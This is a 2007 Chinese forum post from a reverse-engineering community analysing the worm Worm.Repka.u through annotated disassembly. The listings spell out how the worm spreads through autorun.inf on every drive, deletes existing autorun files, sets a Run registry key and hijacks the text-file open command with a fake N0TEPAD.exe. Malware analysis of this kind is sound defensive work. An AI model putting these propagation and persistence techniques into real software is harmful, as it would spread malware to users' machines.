[分析]Worm.Repka.u二次深度分析-软件逆向-看雪-安全社区|安全招聘|kanxue.com

[分析]Worm.Repka.u二次深度分析

发表于: 2007-6-12 19:04 5310

[分析]Worm.Repka.u二次深度分析

NONAME剑人

2007-6-12 19:04

5310

病毒名称：Worm.Repka.u
使用工具： OD,影子系统
文章版本： 2.0
QQ号：464252600
作者：NONAME剑人
组织：[CPU]
年龄：CRACKER里最小的:)
---------------------------
写这个2.0的目的是因为某某仙人说俺1.0的文章分析太水，看来只好重新分析了：）
PS：那个1.0之所以太水是因为没装影子系统，不敢动态调试。这也许就是高手和菜鸟的区别吧（偶菜你高……）:P
OK，闲话少说，分析分析：）
我的文章主要都在注释里，所以大家仔细看原代码……
首先加断点 bpx CreateFileA(抱歉，我记得我+的是这个断点)
00401850  /> \55          PUSH EBP                               ;//此段程序为病毒开始传染的过程……
00401851  |.  8BEC       MOV EBP,ESP
00401853  |.  81EC 70010000 SUB ESP,170
00401859  |.  53          PUSH EBX
0040185A  |.  56          PUSH ESI
0040185B  |.  57          PUSH EDI
0040185C  |.  8DBD 90FEFFFF LEA EDI,DWORD PTR SS:[EBP-170]
00401862  |.  B9 5C000000 MOV ECX,5C
00401867  |.  B8 CCCCCCCC MOV EAX,CCCCCCCC
0040186C  |.  F3:AB       REP STOS DWORD PTR ES:[EDI]
0040186E  |.  8BF4       MOV ESI,ESP
00401870  |.  68 00ED4200 PUSH reper.0042ED00                   ; /pThreadId = reper.0042ED00
00401875  |.  6A 00       PUSH 0                                  ; |CreationFlags = 0
00401877  |.  6A 00       PUSH 0                                  ; |pThreadParm = NULL
00401879  |.  68 2D104000 PUSH reper.0040102D                   ; |ThreadFunction = reper.0040102D
0040187E  |.  6A 00       PUSH 0                                  ; |StackSize = 0
00401880  |.  6A 00       PUSH 0                                  ; |pSecurity = NULL
00401882  |.  FF15 4C134300 CALL DWORD PTR DS:[<&KERNEL32.CreateThre>; \CreateThread
00401888  |.  3BF4       CMP ESI,ESP
0040188A  |.  E8 514F0000 CALL reper.004067E0
0040188F  |.  A3 F8EC4200 MOV DWORD PTR DS:[42ECF8],EAX
00401894  |.  C745 FC 04000>MOV DWORD PTR SS:[EBP-4],4
0040189B  |.  C645 F8 63 MOV BYTE PTR SS:[EBP-8],63
0040189F  |.  833D 0CEE4200>CMP DWORD PTR DS:[42EE0C],0
004018A6  |.  0F85 21020000 JNZ reper.00401ACD
004018AC  |.  8BF4       MOV ESI,ESP
004018AE  |.  FF15 C4124300 CALL DWORD PTR DS:[<&KERNEL32.GetLogical>; [GetLogicalDrives
004018B4  |.  3BF4       CMP ESI,ESP
004018B6  |.  E8 254F0000 CALL reper.004067E0
004018BB  |.  8985 F4FEFFFF MOV DWORD PTR SS:[EBP-10C],EAX
004018C1  |.  C785 F0FEFFFF>MOV DWORD PTR SS:[EBP-110],0
004018CB  |.  EB 0F       JMP SHORT reper.004018DC
004018CD  |>  8B85 F0FEFFFF /MOV EAX,DWORD PTR SS:[EBP-110]       ;  把EBP-110的内存数据放到这里面
004018D3  |.  83C0 01    |ADD EAX,1                            ;  ASCII码+1，遍历各个盘符
004018D6  |.  8985 F0FEFFFF |MOV DWORD PTR SS:[EBP-110],EAX       ;  再把遍历后的送回去
004018DC  |>  83BD F0FEFFFF> CMP DWORD PTR SS:[EBP-110],20          ;  如果ASCII加的比20还大（一共就26个盘……看来把C盘放到Z盘比较妥当……）
004018E3  |.  0F8D 05010000 |JGE reper.004019EE                   ;  那么跳转，否则你就呆着吧！
004018E9  |.  8B8D F4FEFFFF |MOV ECX,DWORD PTR SS:[EBP-10C]
004018EF  |.  234D FC    |AND ECX,DWORD PTR SS:[EBP-4]
004018F2  |.  85C9       |TEST ECX,ECX                         ; 看看这个盘符行不行
004018F4  |.  0F84 DE000000 |JE reper.004019D8
004018FA  |.  68 DCA04200 |PUSH reper.0042A0DC                   ; /ASCII ":\reper.exe" //为什么要+":\"呢？是因为病毒遍历硬盘后可以直接"c"+":\reper.exe"....
004018FF  |.  0FBE55 F8    |MOVSX EDX,BYTE PTR SS:[EBP-8]          ; |
00401903  |.  52          |PUSH EDX                               ; |Arg3
00401904  |.  68 74A14200 |PUSH reper.0042A174                   ; |Arg2 = 0042A174 ASCII "%c%s"
00401909  |.  8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]       ; |
0040190F  |.  50          |PUSH EAX                               ; |Arg1
00401910  |.  E8 EB4C0000 |CALL reper.00406600                   ; \reper.00406600
00401915  |.  83C4 10    |ADD ESP,10
00401918  |.  8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
0040191E  |.  51          |PUSH ECX                               ;  开始把原来的[EBP-110]和":\reper.exe"合起来了
0040191F  |.  E8 04F7FFFF |CALL reper.00401028
00401924  |.  83C4 04    |ADD ESP,4
00401927  |.  3B05 10EE4200 |CMP EAX,DWORD PTR DS:[42EE10]
0040192D  |.  74 1E       |JE SHORT reper.0040194D
0040192F  |.  8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
00401935  |.  52          |PUSH EDX
00401936  |.  E8 D9F6FFFF |CALL reper.00401014
0040193B  |.  83C4 04    |ADD ESP,4
0040193E  |.  8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
00401944  |.  50          |PUSH EAX                               ; /Arg1
00401945  |.  E8 C64F0000 |CALL reper.00406910                   ; \reper.00406910
0040194A  |.  83C4 04    |ADD ESP,4
0040194D  |>  8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
00401953  |.  51          |PUSH ECX
00401954  |.  E8 B1F6FFFF |CALL reper.0040100A
00401959  |.  83C4 04    |ADD ESP,4
0040195C  |.  8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
00401962  |.  52          |PUSH EDX
00401963  |.  E8 A7F6FFFF |CALL reper.0040100F
00401968  |.  83C4 04    |ADD ESP,4
0040196B  |.  68 6CA04200 |PUSH reper.0042A06C                   ; /Arg4 = 0042A06C ASCII ":\autorun.inf"
00401970  |.  0FBE45 F8    |MOVSX EAX,BYTE PTR SS:[EBP-8]          ; //原理同上……变成AUTORUN.INF了
00401974  |.  50          |PUSH EAX                               ; |Arg3
00401975  |.  68 74A14200 |PUSH reper.0042A174                   ; |Arg2 = 0042A174 ASCII "%c%s" //这个参数高手指点一下
0040197A  |.  8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]       ; |
00401980  |.  51          |PUSH ECX                               ; |Arg1
00401981  |.  E8 7A4C0000 |CALL reper.00406600                   ; \reper.00406600
00401986  |.  83C4 10    |ADD ESP,10
00401989  |.  8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
0040198F  |.  52          |PUSH EDX
00401990  |.  E8 A2F6FFFF |CALL reper.00401037
00401995  |.  83C4 04    |ADD ESP,4
00401998  |.  85C0       |TEST EAX,EAX
0040199A  |.  75 1E       |JNZ SHORT reper.004019BA
0040199C  |.  8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004019A2  |.  50          |PUSH EAX
004019A3  |.  E8 6CF6FFFF |CALL reper.00401014
004019A8  |.  83C4 04    |ADD ESP,4
004019AB  |.  8D8D F8FEFFFF |LEA ECX,DWORD PTR SS:[EBP-108]
004019B1  |.  51          |PUSH ECX                               ; /Arg1
004019B2  |.  E8 594F0000 |CALL reper.00406910                   ; \reper.00406910
004019B7  |.  83C4 04    |ADD ESP,4
004019BA  |>  8D95 F8FEFFFF |LEA EDX,DWORD PTR SS:[EBP-108]
004019C0  |.  52          |PUSH EDX
004019C1  |.  E8 3FF6FFFF |CALL reper.00401005
004019C6  |.  83C4 04    |ADD ESP,4
004019C9  |.  8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004019CF  |.  50          |PUSH EAX
004019D0  |.  E8 3AF6FFFF |CALL reper.0040100F
004019D5  |.  83C4 04    |ADD ESP,4
004019D8  |>  8B4D FC    |MOV ECX,DWORD PTR SS:[EBP-4]
004019DB  |.  D1E1       |SHL ECX,1
004019DD  |.  894D FC    |MOV DWORD PTR SS:[EBP-4],ECX
004019E0  |.  8A55 F8    |MOV DL,BYTE PTR SS:[EBP-8]
004019E3  |.  80C2 01    |ADD DL,1
004019E6  |.  8855 F8    |MOV BYTE PTR SS:[EBP-8],DL
004019E9  |.^ E9 DFFEFFFF \JMP reper.004018CD
004019EE  |>  68 44A14200 PUSH reper.0042A144                   ; /ASCII "viewer.exe" //又要把自己放到C:\WINDOWS下，2000的同志福气了：）
004019F3  |.  68 F8EB4200 PUSH reper.0042EBF8                   ; |Arg3 = 0042EBF8 ASCII "C:\windows\"
004019F8  |.  68 30A04200 PUSH reper.0042A030                   ; |Arg2 = 0042A030 ASCII "%s%s"
004019FD  |.  68 F8EA4200 PUSH reper.0042EAF8                   ; |Arg1 = 0042EAF8 ASCII "C:\windows\viewer.exe"
00401A02  |.  E8 F94B0000 CALL reper.00406600                   ; \reper.00406600
00401A07  |.  83C4 10    ADD ESP,10
00401A0A  |.  68 F8EA4200 PUSH reper.0042EAF8                   ;  ASCII "C:\windows\viewer.exe"
00401A0F  |.  E8 14F6FFFF CALL reper.00401028
00401A14  |.  83C4 04    ADD ESP,4
00401A17  |.  3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
00401A1D  |.  74 1A       JE SHORT reper.00401A39                ;  如果有文件的话就跳
00401A1F  |.  68 F8EA4200 PUSH reper.0042EAF8                   ;  ASCII "C:\windows\viewer.exe"
00401A24  |.  E8 EBF5FFFF CALL reper.00401014
00401A29  |.  83C4 04    ADD ESP,4
00401A2C  |.  68 F8EA4200 PUSH reper.0042EAF8                   ; /Arg1 = 0042EAF8 ASCII "C:\windows\viewer.exe"
00401A31  |.  E8 DA4E0000 CALL reper.00406910                   ; \reper.00406910
00401A36  |.  83C4 04    ADD ESP,4
00401A39  |>  68 F8EA4200 PUSH reper.0042EAF8                   ;  ASCII "C:\windows\viewer.exe"
00401A3E  |.  E8 C7F5FFFF CALL reper.0040100A
00401A43  |.  83C4 04    ADD ESP,4
00401A46  |.  68 F8EA4200 PUSH reper.0042EAF8                   ;  ASCII "C:\windows\viewer.exe" 不知道为什么要覆盖？
00401A4B  |.  E8 C4F5FFFF CALL reper.00401014
00401A50  |.  83C4 04    ADD ESP,4
00401A53  |.  68 F8EB4200 PUSH reper.0042EBF8                   ; /Arg3 = 0042EBF8 ASCII "C:\windows\"
00401A58  |.  68 2CA14200 PUSH reper.0042A12C                   ; |Arg2 = 0042A12C ASCII "%ssystem32\N0TEPAD.exe" //看好了，是%s和system32
00401A5D  |.  68 F8E94200 PUSH reper.0042E9F8                   ; |释放N0TEPAD（是N零TEPAD……）
00401A62  |.  E8 994B0000 CALL reper.00406600                   ; \reper.00406600
00401A67  |.  83C4 0C    ADD ESP,0C
00401A6A  |.  68 F8E94200 PUSH reper.0042E9F8                   ;  ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
//改关联的初始化（即入栈。是栈吧？高手原谅我吧……）
00401A6F  |.  E8 B4F5FFFF CALL reper.00401028
00401A74  |.  83C4 04    ADD ESP,4
00401A77  |.  3B05 10EE4200 CMP EAX,DWORD PTR DS:[42EE10]
00401A7D  |.  74 1A       JE SHORT reper.00401A99
00401A7F  |.  68 F8E94200 PUSH reper.0042E9F8                   ;  ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401A84  |.  E8 8BF5FFFF CALL reper.00401014
00401A89  |.  83C4 04    ADD ESP,4
00401A8C  |.  68 F8E94200 PUSH reper.0042E9F8                   ; /Arg1 = 0042E9F8 ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401A91  |.  E8 7A4E0000 CALL reper.00406910                   ; \reper.00406910
00401A96  |.  83C4 04    ADD ESP,4
00401A99  |>  68 F8E94200 PUSH reper.0042E9F8                   ;  ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401A9E  |.  E8 67F5FFFF CALL reper.0040100A
00401AA3  |.  83C4 04    ADD ESP,4
00401AA6  |.  68 F8E94200 PUSH reper.0042E9F8                   ;  ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401AAB  |.  E8 64F5FFFF CALL reper.00401014
00401AB0  |.  83C4 04    ADD ESP,4
00401AB3  |.  68 50B34200 PUSH reper.0042B350
00401AB8  |.  E8 4DF5FFFF CALL reper.0040100A
00401ABD  |.  83C4 04    ADD ESP,4
00401AC0  |.  68 50B34200 PUSH reper.0042B350
00401AC5  |.  E8 4AF5FFFF CALL reper.00401014
00401ACA  |.  83C4 04    ADD ESP,4
00401ACD  |>  A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
00401AD2  |.  83C0 01    ADD EAX,1
00401AD5  |.  A3 0CEE4200 MOV DWORD PTR DS:[42EE0C],EAX
00401ADA  |.  A1 0CEE4200 MOV EAX,DWORD PTR DS:[42EE0C]
00401ADF  |.  99          CDQ
00401AE0  |.  B9 05000000 MOV ECX,5
00401AE5  |.  F7F9       IDIV ECX
00401AE7  |.  8915 0CEE4200 MOV DWORD PTR DS:[42EE0C],EDX
00401AED  |.  C785 ECFEFFFF>MOV DWORD PTR SS:[EBP-114],reper.0042EAF>;  ASCII "C:\windows\viewer.exe"
00401AF7  |.  C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],reper.0042B2E>;  ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
00401B01  |.  8BF4       MOV ESI,ESP                            ;  以上这几行说明病毒开始向注册表里添东西了
00401B03  |.  8D95 E8FEFFFF LEA EDX,DWORD PTR SS:[EBP-118]
00401B09  |.  52          PUSH EDX                               ; /pHandle
00401B0A  |.  68 06000200 PUSH 20006                            ; |Access = KEY_WRITE
00401B0F  |.  6A 00       PUSH 0                                  ; |Reserved = 0
00401B11  |.  8B85 E4FEFFFF MOV EAX,DWORD PTR SS:[EBP-11C]          ; |
00401B17  |.  50          PUSH EAX                               ; |Subkey
00401B18  |.  68 02000080 PUSH 80000002                         ; |hKey = HKEY_LOCAL_MACHINE
00401B1D  |.  FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA -- 加入的=PUSH 80000002(HKEY_LOCAL_MACHINE)+EAX(Software\Microsoft\Windows\CurrentVersion\Run),写操作
00401B23  |.  3BF4       CMP ESI,ESP
00401B25  |.  E8 B64C0000 CALL reper.004067E0
00401B2A  |.  8985 E0FEFFFF MOV DWORD PTR SS:[EBP-120],EAX
00401B30  |.  8B8D ECFEFFFF MOV ECX,DWORD PTR SS:[EBP-114]
00401B36  |.  51          PUSH ECX
00401B37  |.  E8 C44B0000 CALL reper.00406700
00401B3C  |.  83C4 04    ADD ESP,4
00401B3F  |.  8BF4       MOV ESI,ESP                            ;  以下几步是确切地把病毒加载到注册表中，刚才是建，下面是改，写
00401B41  |.  50          PUSH EAX                               ; /BufSize
00401B42  |.  8B95 ECFEFFFF MOV EDX,DWORD PTR SS:[EBP-114]          ; |
00401B48  |.  52          PUSH EDX                               ; |Buffer
00401B49  |.  6A 01       PUSH 1                                  ; |ValueType = REG_SZ
00401B4B  |.  6A 00       PUSH 0                                  ; |Reserved = 0
00401B4D  |.  68 ACA04200 PUSH reper.0042A0AC                   ; |ValueName = "runreper" 抱歉，我对注册表不怎么敢兴趣，我想可能是项名为runreper,值为c:\windows\viewer.exe
00401B52  |.  8B85 E8FEFFFF MOV EAX,DWORD PTR SS:[EBP-118]          ; |
00401B58  |.  50          PUSH EAX                               ; |hKey
00401B59  |.  FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00401B5F  |.  3BF4       CMP ESI,ESP
00401B61  |.  E8 7A4C0000 CALL reper.004067E0
00401B66  |.  8985 DCFEFFFF MOV DWORD PTR SS:[EBP-124],EAX
00401B6C  |.  8BF4       MOV ESI,ESP
00401B6E  |.  8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118]
00401B74  |.  51          PUSH ECX                               ; /hKey
00401B75  |.  FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401B7B  |.  3BF4       CMP ESI,ESP
00401B7D  |.  E8 5E4C0000 CALL reper.004067E0                   ;  病毒耍阴！经过UE的确认，是N零TEPAD，这是在改关联！
00401B82  |.  C785 E4FEFFFF>MOV DWORD PTR SS:[EBP-11C],reper.0042B33>;  ASCII "txtfile\shell\open\command"
00401B8C  |.  C785 D8FEFFFF>MOV DWORD PTR SS:[EBP-128],reper.0042E9F>;  ASCII "C:\windows\system32\N0TEPAD.exe %1 %1 %1 %1 %1"
00401B96  |.  68 68A04200 PUSH reper.0042A068                   ;  ASCII " %1"
00401B9B  |.  8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
00401BA1  |.  52          PUSH EDX
00401BA2  |.  E8 894C0000 CALL reper.00406830
00401BA7  |.  83C4 08    ADD ESP,8
00401BAA  |.  8BF4       MOV ESI,ESP
00401BAC  |.  8D85 E8FEFFFF LEA EAX,DWORD PTR SS:[EBP-118]          ;  改HEKY_CALSSES_BOOT\txtfile\shell\open\command 下的关联！
00401BB2  |.  50          PUSH EAX                               ; /pHandle
00401BB3  |.  68 06000200 PUSH 20006                            ; |Access = KEY_WRITE //写注册表
00401BB8  |.  6A 00       PUSH 0                                  ; |Reserved = 0
00401BBA  |.  8B8D E4FEFFFF MOV ECX,DWORD PTR SS:[EBP-11C]          ; |
00401BC0  |.  51          PUSH ECX                               ; |Subkey
00401BC1  |.  68 00000080 PUSH 80000000                         ; |hKey = HKEY_CLASSES_ROOT
00401BC6  |.  FF15 8C124300 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA //打开注册表
00401BCC  |.  3BF4       CMP ESI,ESP
00401BCE  |.  E8 0D4C0000 CALL reper.004067E0
00401BD3  |.  8985 D4FEFFFF MOV DWORD PTR SS:[EBP-12C],EAX
00401BD9  |.  8B95 D8FEFFFF MOV EDX,DWORD PTR SS:[EBP-128]
00401BDF  |.  52          PUSH EDX
00401BE0  |.  E8 1B4B0000 CALL reper.00406700
00401BE5  |.  83C4 04    ADD ESP,4
00401BE8  |.  8BF4       MOV ESI,ESP
00401BEA  |.  50          PUSH EAX                               ; /BufSize
00401BEB  |.  8B85 D8FEFFFF MOV EAX,DWORD PTR SS:[EBP-128]          ; |
00401BF1  |.  50          PUSH EAX                               ; |Buffer
00401BF2  |.  6A 02       PUSH 2                                  ; |ValueType = REG_EXPAND_SZ
00401BF4  |.  6A 00       PUSH 0                                  ; |Reserved = 0
00401BF6  |.  6A 00       PUSH 0                                  ; |ValueName = NULL
00401BF8  |.  8B8D E8FEFFFF MOV ECX,DWORD PTR SS:[EBP-118]          ; |
00401BFE  |.  51          PUSH ECX                               ; |hKey
00401BFF  |.  FF15 80124300 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA
00401C05  |.  3BF4       CMP ESI,ESP
00401C07  |.  E8 D44B0000 CALL reper.004067E0
00401C0C  |.  8985 D0FEFFFF MOV DWORD PTR SS:[EBP-130],EAX
00401C12  |.  8BF4       MOV ESI,ESP
00401C14  |.  8B95 E8FEFFFF MOV EDX,DWORD PTR SS:[EBP-118]
00401C1A  |.  52          PUSH EDX                               ; /hKey
00401C1B  |.  FF15 84124300 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKe>; \RegCloseKey
00401C21  |.  3BF4       CMP ESI,ESP
00401C23  |.  E8 B84B0000 CALL reper.004067E0
00401C28  |.  5F          POP EDI
00401C29  |.  5E          POP ESI
00401C2A  |.  5B          POP EBX
00401C2B  |.  81C4 70010000 ADD ESP,170
00401C31  |.  3BEC       CMP EBP,ESP
00401C33  |.  E8 A84B0000 CALL reper.004067E0
00401C38  |.  8BE5       MOV ESP,EBP
00401C3A  |.  5D          POP EBP
00401C3B  \.  C2 1000    RETN 10
这段是上面释放AUTORUN时的跟踪
00401D40 > \55          PUSH EBP
00401D41 .  8BEC       MOV EBP,ESP
00401D43 .  6A FF       PUSH -1
00401D45 .  68 C9894100 PUSH reper.004189C9                   ;  SE 处理程序安装
00401D4A .  64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
00401D50 .  50          PUSH EAX
00401D51 .  64:8925 00000>MOV DWORD PTR FS:[0],ESP
00401D58 .  81EC A4000000 SUB ESP,0A4
00401D5E .  53          PUSH EBX
00401D5F .  56          PUSH ESI
00401D60 .  57          PUSH EDI
00401D61 .  8DBD 50FFFFFF LEA EDI,DWORD PTR SS:[EBP-B0]
00401D67 .  B9 29000000 MOV ECX,29
00401D6C .  B8 CCCCCCCC MOV EAX,CCCCCCCC
00401D71 .  F3:AB       REP STOS DWORD PTR ES:[EDI]
00401D73 .  6A 01       PUSH 1                                  ; /Arg1 = 00000001
00401D75 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
00401D78 .  E8 33080000 CALL reper.004025B0                   ; \reper.004025B0
00401D7D .  C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
00401D84 .  B9 06000000 MOV ECX,6
00401D89 .  BE 7CA04200 MOV ESI,reper.0042A07C                ;  ASCII "[autorun]
open=reper.exe"
00401D8E .  8D7D 90    LEA EDI,DWORD PTR SS:[EBP-70]
00401D91 .  F3:A5       REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401D93 .  A4          MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00401D94 .  A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C]
00401D99 .  50          PUSH EAX                               ; /Arg3 => 000001A4
00401D9A .  6A 02       PUSH 2                                  ; |Arg2 = 00000002
00401D9C .  8B4D 08    MOV ECX,DWORD PTR SS:[EBP+8]          ; |
00401D9F .  51          PUSH ECX                               ; |Arg1
00401DA0 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
00401DA3 .  E8 180F0000 CALL reper.00402CC0                   ; \reper.00402CC0
00401DA8 .  8D55 90    LEA EDX,DWORD PTR SS:[EBP-70]
00401DAB .  52          PUSH EDX                               ; /[autorun]open=reper.exe病毒自从上次跳到释放时，就到了这里
00401DAC .  8D4D B8    LEA ECX,DWORD PTR SS:[EBP-48]          ; |
00401DAF .  E8 0C120000 CALL reper.00402FC0                   ; \reper.00402FC0
00401DB4 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]
00401DB7 .  E8 840F0000 CALL reper.00402D40
00401DBC .  C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
00401DC3 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]
00401DC6 .  E8 67F2FFFF CALL reper.00401032
00401DCB .  8B4D F4    MOV ECX,DWORD PTR SS:[EBP-C]
00401DCE .  64:890D 00000>MOV DWORD PTR FS:[0],ECX
00401DD5 .  5F          POP EDI
00401DD6 .  5E          POP ESI
00401DD7 .  5B          POP EBX
00401DD8 .  81C4 B0000000 ADD ESP,0B0
00401DDE .  3BEC       CMP EBP,ESP
00401DE0 .  E8 FB490000 CALL reper.004067E0
00401DE5 .  8BE5       MOV ESP,EBP
00401DE7 .  5D          POP EBP
00401DE8 .  C3          RETN

然后是释放本体

00401F15 .  68 E9894100 PUSH reper.004189E9                   ;  SE 处理程序安装 -- 病毒开始释放文件……; SE 处理程序安装
00401F1A .  64:A1 0000000>MOV EAX,DWORD PTR FS:[0]
00401F20 .  50          PUSH EAX
00401F21 .  64:8925 00000>MOV DWORD PTR FS:[0],ESP
00401F28 .  81EC 90000000 SUB ESP,90
00401F2E .  53          PUSH EBX
00401F2F .  56          PUSH ESI
00401F30 .  57          PUSH EDI
00401F31 .  8DBD 64FFFFFF LEA EDI,DWORD PTR SS:[EBP-9C]
00401F37 .  B9 24000000 MOV ECX,24
00401F3C .  B8 CCCCCCCC MOV EAX,CCCCCCCC
00401F41 .  F3:AB       REP STOS DWORD PTR ES:[EDI]
00401F43 .  6A 01       PUSH 1                                  ; /Arg1 = 00000001
00401F45 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
00401F48 .  E8 63060000 CALL reper.004025B0                   ; \reper.004025B0
00401F4D .  C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
00401F54 .  A1 3CA24200 MOV EAX,DWORD PTR DS:[42A23C]
00401F59 .  50          PUSH EAX                               ; /Arg3 => 000001A4
00401F5A .  68 80000000 PUSH 80                               ; |Arg2 = 00000080
00401F5F .  8B4D 08    MOV ECX,DWORD PTR SS:[EBP+8]          ; |
00401F62 .  51          PUSH ECX                               ; |Arg1
00401F63 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
00401F66 .  E8 550D0000 CALL reper.00402CC0                   ; \reper.00402CC0
00401F6B .  6A 02       PUSH 2                                  ; /Arg2 = 00000002
00401F6D .  6A 00       PUSH 0                                  ; |Arg1 = 00000000
00401F6F .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]          ; |
00401F72 .  E8 49290000 CALL reper.004048C0                   ; \reper.004048C0
00401F77 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]
00401F7A .  E8 D1290000 CALL reper.00404950
00401F7F .  8945 A8    MOV DWORD PTR SS:[EBP-58],EAX
00401F82 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]
00401F85 .  E8 B60D0000 CALL reper.00402D40
00401F8A .  8B55 A8    MOV EDX,DWORD PTR SS:[EBP-58]
00401F8D .  8955 A4    MOV DWORD PTR SS:[EBP-5C],EDX
00401F90 .  C745 FC FFFFF>MOV DWORD PTR SS:[EBP-4],-1
00401F97 .  8D4D AC    LEA ECX,DWORD PTR SS:[EBP-54]
00401F9A .  E8 93F0FFFF CALL reper.00401032
00401F9F .  8B45 A4    MOV EAX,DWORD PTR SS:[EBP-5C]
00401FA2 .  8B4D F4    MOV ECX,DWORD PTR SS:[EBP-C]
00401FA5 .  64:890D 00000>MOV DWORD PTR FS:[0],ECX
00401FAC .  5F          POP EDI
00401FAD .  5E          POP ESI
00401FAE .  5B          POP EBX
00401FAF .  81C4 9C000000 ADD ESP,9C
00401FB5 .  3BEC       CMP EBP,ESP
00401FB7 .  E8 24480000 CALL reper.004067E0
00401FBC .  8BE5       MOV ESP,EBP
00401FBE .  5D          POP EBP
00401FBF .  C3          RETN

释放毒气……

00406910  /$  55          PUSH EBP
00406911  |.  8BEC       MOV EBP,ESP
00406913  |.  51          PUSH ECX
00406914  |.  8B45 08    MOV EAX,DWORD PTR SS:[EBP+8]
00406917  |.  50          PUSH EAX                               ; /FileName //看看有没有AUTORUN.INF文件
00406918  |.  FF15 50134300 CALL DWORD PTR DS:[<&KERNEL32.DeleteFile>; \DeleteFileA //把别人的AUTORUN给CUT掉
0040691E  |.  85C0       TEST EAX,EAX
00406920  |.  75 0B       JNZ SHORT reper.0040692D
00406922  |.  FF15 40134300 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError
00406928  |.  8945 FC    MOV DWORD PTR SS:[EBP-4],EAX
0040692B  |.  EB 07       JMP SHORT reper.00406934
0040692D  |>  C745 FC 00000>MOV DWORD PTR SS:[EBP-4],0
00406934  |>  837D FC 00 CMP DWORD PTR SS:[EBP-4],0
00406938  |.  74 11       JE SHORT reper.0040694B
0040693A  |.  8B4D FC    MOV ECX,DWORD PTR SS:[EBP-4]
0040693D  |.  51          PUSH ECX                               ; /Arg1
0040693E  |.  E8 7D420000 CALL reper.0040ABC0                   ; \reper.0040ABC0
00406943  |.  83C4 04    ADD ESP,4
00406946  |.  83C8 FF    OR EAX,FFFFFFFF
00406949  |.  EB 02       JMP SHORT reper.0040694D
0040694B  |>  33C0       XOR EAX,EAX
0040694D  |>  8BE5       MOV ESP,EBP
0040694F  |.  5D          POP EBP
00406950  \.  C3          RETN
该AUTORUN倒霉了……
00408897  |.  FF15 84134300 CALL DWORD PTR DS:[<&KERNEL32.CreateFile>; \CreateFileA //病毒开始向C盘发出AUTORUN的创建命令了
0040889D  |.  8945 FC    MOV DWORD PTR SS:[EBP-4],EAX
004088A0  |.  837D FC FF CMP DWORD PTR SS:[EBP-4],-1
004088A4  |.  75 17       JNZ SHORT reper.004088BD
004088A6  |.  FF15 40134300 CALL DWORD PTR DS:[<&KERNEL32.GetLastErr>; [GetLastError
004088AC  |.  50          PUSH EAX                               ; /Arg1
004088AD  |.  E8 0E230000 CALL reper.0040ABC0                   ; \reper.0040ABC0
004088B2  |.  83C4 04    ADD ESP,4
004088B5  |.  83C8 FF    OR EAX,FFFFFFFF
004088B8  |.  E9 AA010000 JMP reper.00408A67
004088BD  |>  8B45 FC    MOV EAX,DWORD PTR SS:[EBP-4]
004088C0  |.  50          PUSH EAX                               ; /hFile
004088C1  |.  FF15 80134300 CALL DWORD PTR DS:[<&KERNEL32.GetFileTyp>; \开始改病毒的属性……
004088C7  |.  8945 F4    MOV DWORD PTR SS:[EBP-C],EAX
004088CA  |.  837D F4 00 CMP DWORD PTR SS:[EBP-C],0
004088CE  |.  75 21       JNZ SHORT reper.004088F1
004088D0  |.  8B4D FC    MOV ECX,DWORD PTR SS:[EBP-4]
004088D3  |.  51          PUSH ECX                               ; /hObject
上段是病毒杀AUTORUN的代码
00413994 > /8BF4       MOV ESI,ESP                            ;  手头没有API大全，不知道下面什么意思。所以把代码发上来
00413996 . |6A 00       PUSH 0                                  ; /MsgFilterMax = 0
00413998 . |6A 00       PUSH 0                                  ; |MsgFilterMin = 0
0041399A . |6A 00       PUSH 0                                  ; |hWnd = NULL
